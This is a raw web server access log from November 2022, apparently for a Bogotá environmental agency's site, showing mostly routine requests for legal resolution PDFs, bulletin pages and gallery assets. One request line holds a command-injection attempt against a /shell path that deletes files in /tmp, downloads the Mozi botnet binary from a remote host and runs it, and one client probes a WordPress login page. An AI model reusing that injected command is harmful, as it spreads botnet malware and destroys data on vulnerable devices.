190.131.217.171 - - [07/Nov/2022:20:53:15 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
190.131.217.171 - - [07/Nov/2022:20:53:16 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
190.131.217.171 - - [07/Nov/2022:20:53:17 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
190.131.217.171 - - [07/Nov/2022:20:53:18 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
216.245.221.92 - - [07/Nov/2022:20:53:48 -0500] "HEAD / HTTP/1.1" 200 -
190.145.240.68 - - [07/Nov/2022:20:55:52 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
190.145.240.68 - - [07/Nov/2022:20:55:52 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
190.145.240.68 - - [07/Nov/2022:20:55:52 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.145.240.68 - - [07/Nov/2022:20:55:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 396098
190.145.240.68 - - [07/Nov/2022:20:55:59 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
190.145.240.68 - - [07/Nov/2022:20:56:01 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
190.145.240.68 - - [07/Nov/2022:20:56:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 429434
201.245.192.253 - - [07/Nov/2022:20:56:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
190.145.240.68 - - [07/Nov/2022:20:56:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2304.pdf HTTP/1.1" 200 450708
172.22.2.4 - - [07/Nov/2022:20:55:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.69 - - [07/Nov/2022:20:57:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2043.pdf HTTP/1.1" 200 434353
20.12.191.72 - - [07/Nov/2022:20:57:45 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [07/Nov/2022:20:56:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
190.145.240.68 - - [07/Nov/2022:20:58:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2095.pdf HTTP/1.1" 200 446358
216.245.221.92 - - [07/Nov/2022:20:58:48 -0500] "HEAD / HTTP/1.1" 200 -
190.145.240.68 - - [07/Nov/2022:20:58:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1839.pdf HTTP/1.1" 200 1614132
190.145.240.68 - - [07/Nov/2022:20:59:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1333.pdf HTTP/1.1" 200 495076
190.145.240.68 - - [07/Nov/2022:21:00:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1552.pdf HTTP/1.1" 200 434137
190.145.240.68 - - [07/Nov/2022:21:01:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1570.pdf HTTP/1.1" 200 321869
201.245.192.253 - - [07/Nov/2022:21:01:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
190.145.240.68 - - [07/Nov/2022:21:01:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1586.pdf HTTP/1.1" 200 451358
190.145.240.68 - - [07/Nov/2022:21:02:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1609.pdf HTTP/1.1" 200 338943
172.22.2.4 - - [07/Nov/2022:21:01:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.145.240.68 - - [07/Nov/2022:21:02:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1604.pdf HTTP/1.1" 200 348142
207.46.13.162 - - [07/Nov/2022:21:03:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 274522
190.145.240.68 - - [07/Nov/2022:21:03:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1630.pdf HTTP/1.1" 200 448974
190.145.240.68 - - [07/Nov/2022:21:03:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1640.pdf HTTP/1.1" 200 652991
172.22.2.4 - - [07/Nov/2022:21:02:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [07/Nov/2022:21:03:48 -0500] "HEAD / HTTP/1.1" 200 -
190.145.240.68 - - [07/Nov/2022:21:03:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1651.pdf HTTP/1.1" 200 464705
207.46.13.11 - - [07/Nov/2022:21:04:17 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
190.145.240.68 - - [07/Nov/2022:21:04:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1671-.pdf HTTP/1.1" 200 177319
114.119.132.76 - - [07/Nov/2022:21:04:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0629.pdf HTTP/1.1" 200 538756
190.145.240.68 - - [07/Nov/2022:21:05:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1740.pdf HTTP/1.1" 200 308808
190.145.240.68 - - [07/Nov/2022:21:05:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1808.pdf HTTP/1.1" 200 345965
190.145.240.68 - - [07/Nov/2022:21:05:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1752.pdf HTTP/1.1" 200 678012
201.245.192.253 - - [07/Nov/2022:21:06:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
190.145.240.68 - - [07/Nov/2022:21:06:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1776.pdf HTTP/1.1" 200 349894
172.22.2.4 - - [07/Nov/2022:21:06:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [07/Nov/2022:21:06:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [07/Nov/2022:21:06:37 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [07/Nov/2022:21:06:37 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [07/Nov/2022:21:06:37 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [07/Nov/2022:21:06:37 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
186.28.215.130 - - [07/Nov/2022:21:06:39 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.215.130 - - [07/Nov/2022:21:06:40 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.28.215.130 - - [07/Nov/2022:21:06:45 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 438883
191.95.162.154 - - [07/Nov/2022:21:06:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.162.154 - - [07/Nov/2022:21:06:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.95.162.154 - - [07/Nov/2022:21:06:54 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.28.215.130 - - [07/Nov/2022:21:07:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/3101.pdf HTTP/1.1" 200 302664
190.145.240.68 - - [07/Nov/2022:21:07:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1764.pdf HTTP/1.1" 200 362232
186.28.215.130 - - [07/Nov/2022:21:07:29 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.215.130 - - [07/Nov/2022:21:07:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 438883
190.145.240.68 - - [07/Nov/2022:21:07:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1759.pdf HTTP/1.1" 200 339667
172.22.2.4 - - [07/Nov/2022:21:06:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
190.145.240.68 - - [07/Nov/2022:21:07:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1752.pdf HTTP/1.1" 200 678012
190.145.240.68 - - [07/Nov/2022:21:08:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1759.pdf HTTP/1.1" 200 339667
190.145.240.68 - - [07/Nov/2022:21:08:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1754.pdf HTTP/1.1" 200 401160
190.145.240.68 - - [07/Nov/2022:21:08:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1759.pdf HTTP/1.1" 200 339667
172.22.2.4 - - [07/Nov/2022:21:07:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.145.240.68 - - [07/Nov/2022:21:08:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1754.pdf HTTP/1.1" 200 401160
216.245.221.92 - - [07/Nov/2022:21:08:48 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:21:07:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
190.145.240.68 - - [07/Nov/2022:21:10:00 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
190.145.240.68 - - [07/Nov/2022:21:10:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 166164
190.145.240.68 - - [07/Nov/2022:21:10:33 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
190.145.240.68 - - [07/Nov/2022:21:10:36 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 247791
190.145.240.68 - - [07/Nov/2022:21:10:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 200 4328597
201.245.192.253 - - [07/Nov/2022:21:11:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
40.77.167.3 - - [07/Nov/2022:21:12:54 -0500] "GET /Publicaciones/2022EE177915.pdf HTTP/1.1" 404 228
216.245.221.92 - - [07/Nov/2022:21:13:48 -0500] "HEAD / HTTP/1.1" 200 -
191.107.177.119 - - [07/Nov/2022:21:15:27 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.107.177.119 - - [07/Nov/2022:21:15:27 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.107.177.119 - - [07/Nov/2022:21:15:28 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [07/Nov/2022:21:16:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
191.107.177.119 - - [07/Nov/2022:21:16:18 -0500] "POST /appsia/controlador HTTP/1.1" 200 3597
191.107.177.119 - - [07/Nov/2022:21:16:19 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
191.107.177.119 - - [07/Nov/2022:21:16:25 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
191.107.177.119 - - [07/Nov/2022:21:16:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
191.107.177.119 - - [07/Nov/2022:21:16:37 -0500] "POST /appsia/controlador HTTP/1.1" 200 3597
191.107.177.119 - - [07/Nov/2022:21:16:37 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
191.107.177.119 - - [07/Nov/2022:21:16:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
114.119.141.51 - - [07/Nov/2022:21:16:50 -0500] "GET /BLA/resoluciones/AUTOS%202016/0235.pdf HTTP/1.1" 200 580173
191.107.177.119 - - [07/Nov/2022:21:16:57 -0500] "POST /appsia/controlador HTTP/1.1" 200 3597
191.107.177.119 - - [07/Nov/2022:21:16:57 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
191.107.177.119 - - [07/Nov/2022:21:17:02 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [07/Nov/2022:21:17:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
191.107.177.119 - - [07/Nov/2022:21:17:29 -0500] "POST /appsia/controlador HTTP/1.1" 200 3597
191.107.177.119 - - [07/Nov/2022:21:17:29 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
207.46.13.131 - - [07/Nov/2022:21:18:34 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/pieza-dia-mundial-general-tinguas-8-mayo-1200x480.jpg HTTP/1.1" 200 87528
207.46.13.11 - - [07/Nov/2022:21:18:48 -0500] "GET /Publicaciones/2022EE20049.pdf HTTP/1.1" 404 227
216.245.221.92 - - [07/Nov/2022:21:18:48 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.190 - - [07/Nov/2022:21:18:56 -0500] "GET /Residuos/lavanderias/lavanderias.html HTTP/1.1" 200 1965
201.245.192.253 - - [07/Nov/2022:21:21:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43647
201.245.192.253 - - [07/Nov/2022:21:21:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42191
201.245.192.253 - - [07/Nov/2022:21:21:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [07/Nov/2022:21:23:48 -0500] "HEAD / HTTP/1.1" 200 -
42.225.31.127 - - [07/Nov/2022:21:23:59 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://42.225.31.127:37958/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 1018
172.22.2.4 - - [07/Nov/2022:21:22:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.84.88.164 - - [07/Nov/2022:21:25:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.88.164 - - [07/Nov/2022:21:25:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.88.164 - - [07/Nov/2022:21:25:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [07/Nov/2022:21:23:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
93.158.161.72 - - [07/Nov/2022:21:25:43 -0500] "-" 408 -
93.158.161.5 - - [07/Nov/2022:21:25:48 -0500] "-" 408 -
77.88.5.134 - - [07/Nov/2022:21:25:54 -0500] "-" 408 -
93.158.161.29 - - [07/Nov/2022:21:26:00 -0500] "-" 408 -
201.245.192.253 - - [07/Nov/2022:21:26:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.232 - - [07/Nov/2022:21:26:14 -0500] "-" 408 -
77.88.5.27 - - [07/Nov/2022:21:26:29 -0500] "-" 408 -
93.158.161.55 - - [07/Nov/2022:21:26:59 -0500] "-" 408 -
93.158.161.76 - - [07/Nov/2022:21:27:59 -0500] "-" 408 -
216.245.221.92 - - [07/Nov/2022:21:28:48 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.165 - - [07/Nov/2022:21:28:59 -0500] "-" 408 -
172.22.2.4 - - [07/Nov/2022:21:28:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:21:31:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43647
201.245.192.253 - - [07/Nov/2022:21:31:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42191
201.245.192.253 - - [07/Nov/2022:21:31:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:21:29:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
172.22.2.4 - - [07/Nov/2022:21:31:40 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [07/Nov/2022:21:31:40 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [07/Nov/2022:21:31:40 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [07/Nov/2022:21:31:40 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [07/Nov/2022:21:31:41 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [07/Nov/2022:21:31:41 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [07/Nov/2022:21:31:41 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [07/Nov/2022:21:31:41 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [07/Nov/2022:21:31:45 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [07/Nov/2022:21:31:46 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [07/Nov/2022:21:31:47 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [07/Nov/2022:21:31:47 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [07/Nov/2022:21:31:47 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [07/Nov/2022:21:31:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5663&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1228
192.144.113.210 - - [07/Nov/2022:21:31:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5663.pdf HTTP/1.1" 200 502425
172.22.2.4 - - [07/Nov/2022:21:31:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
186.31.122.176 - - [07/Nov/2022:21:32:14 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/0344.pdf HTTP/1.1" 200 353017
186.31.122.176 - - [07/Nov/2022:21:32:14 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
185.119.81.100 - - [07/Nov/2022:21:32:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:21:32:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
40.77.167.41 - - [07/Nov/2022:21:33:16 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [07/Nov/2022:21:33:48 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.131 - - [07/Nov/2022:21:35:06 -0500] "GET /portaldeninos/2019/08/05/ruido-2/ HTTP/1.1" 200 93580
172.22.2.4 - - [07/Nov/2022:21:35:36 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [07/Nov/2022:21:35:36 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [07/Nov/2022:21:35:36 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [07/Nov/2022:21:35:36 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [07/Nov/2022:21:35:36 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [07/Nov/2022:21:35:36 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [07/Nov/2022:21:35:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
190.240.2.69 - - [07/Nov/2022:21:35:43 -0500] "-" 408 -
172.22.2.4 - - [07/Nov/2022:21:35:43 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=Aire&ano=&resuelve= HTTP/1.1" 200 949
172.22.2.4 - - [07/Nov/2022:21:35:44 -0500] "GET /BLA/boletinlegal/images/docs.png HTTP/1.1" 200 10288
172.22.2.4 - - [07/Nov/2022:21:35:50 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=emisiones&ano=&resuelve= HTTP/1.1" 200 19168
172.22.2.4 - - [07/Nov/2022:21:35:51 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:21:36:08 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=residuos&ano=&resuelve= HTTP/1.1" 200 20100
201.245.192.253 - - [07/Nov/2022:21:36:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:21:34:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
